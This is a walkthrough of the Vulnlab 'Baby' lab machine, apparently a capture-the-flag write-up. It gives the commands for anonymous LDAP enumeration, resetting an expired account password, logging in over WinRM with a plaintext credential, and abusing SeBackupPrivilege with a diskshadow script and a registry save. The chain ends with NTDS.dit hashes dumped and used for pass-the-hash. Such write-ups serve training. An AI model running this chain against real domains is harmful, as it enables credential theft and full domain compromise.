# Vulnlab - Baby
## NMAP
```bash
Nmap scan report for 10.10.83.40
Host is up (0.081s latency).
Not shown: 65523 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
135/tcp open tcpwrapped
139/tcp open tcpwrapped
389/tcp open tcpwrapped
445/tcp open tcpwrapped
593/tcp open tcpwrapped
3268/tcp open tcpwrapped
3389/tcp open tcpwrapped
| ssl-cert: Subject: commonName=BabyDC.baby.vl
| Issuer: commonName=BabyDC.baby.vl
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2023-06-16T16:00:59
| Not valid after: 2023-12-16T16:00:59
| MD5: 55aa85b5f2fd316af5fbb1c8ad357d53
|_SHA-1: ae0ab02e5de2d54a9180931ff745d5a00deb41a2
|_ssl-date: 2023-06-17T16:09:48+00:00; +24s from scanner time.
5985/tcp open tcpwrapped
49664/tcp open tcpwrapped
60083/tcp open tcpwrapped
65331/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
```
## PORT 445 (SMB)
Enumerating smb shares with anonymous user it doesn't allow us to either list or read shares being unauthenticated
We can move on to ldap which is running on port 389
## PORT 389 (LDAP)
On checking ldap with null authentication
```bash
ldapsearch -x -H ldap://10.10.83.40 -D '' -w '' -b "DC=baby,DC=vl"
```
This starts to return us usernames
We can use grep to filter for usernames
```bash
ldapsearch -x -H ldap://10.10.83.40 -D '' -w '' -b "DC=baby,DC=vl" | grep sAMAccountName | awk -F: '{ print $2 }' | awk '{ gsub(/ /,""); print }'
```
With `kerbrute` we can verify domain users which also perform AS-REP roasting but here it didn't found any domain user with pre-authentication disabled
We can grep for user descriptions where on `Teresa.Bell` 's password was found from it's description
But using this password for Teresa failed as this password doesn't belong to her
Spraying this password across the domain didn't worked as well
## Foothold (Connor.Wilkinson)
So going back to ldap, there was a user`Caroline.Robinson` which didn't had any attributes thus didn't get covered when it was getting filtered with `sAMAccountName`
For this username the password is valid but it needs to be changed
We can change her password by using impacket's `smbpasswd` by referring to this article
https://exploit-notes.hdks.org/exploit/windows/active-directory/smb-pentesting/
```bash
smbpasswd -U Caroline.Robinson -r 10.10.83.40
```
We can try authenticating on WinRM to see if this user is in remote desktop group
It shows Pwn3d! status which means we can login through WinRM
```bash
evil-winrm -i 10.10.83.40 -u 'Caroline.Robinson' -p 'BabyStart12345$Abc#!'
```
Checking the privileges of this account with `whoami /all` we have `SeBackupPrivilege` privilege
>Caroline's password will keep getting revert back as there was a script running, so you'll need to change the password again
## Privilege Escalation (Administrator)
Following this article to abuse `SeBackupPrivilege`
https://www.hackingarticles.in/windows-privilege-escalation-sebackupprivilege/
Create a `dsh` script file and convert it to dos format with `unix2dos`
```bash
set context persistent nowriters
add volume c: alias owo
create
expose %owo% z:
```
Now with `robocop`, copying `NTDS.dit` file in current directory
Downloading the file on to our kali machine
After downloading the file we'll have ntds.dit
We'll also need `SYSTEM` file
```powershell
reg save hklm\system C:\Windows\Temp\system
```
Having this file, we'll be able to parse through NTDS.dit file to dump hashes and get the administrator's hash
Now with `pass the hash` we'll be able to login as administrator
## References
- https://book.hacktricks.xyz/network-services-pentesting/pentesting-ldap
- https://exploit-notes.hdks.org/exploit/windows/active-directory/smb-pentesting/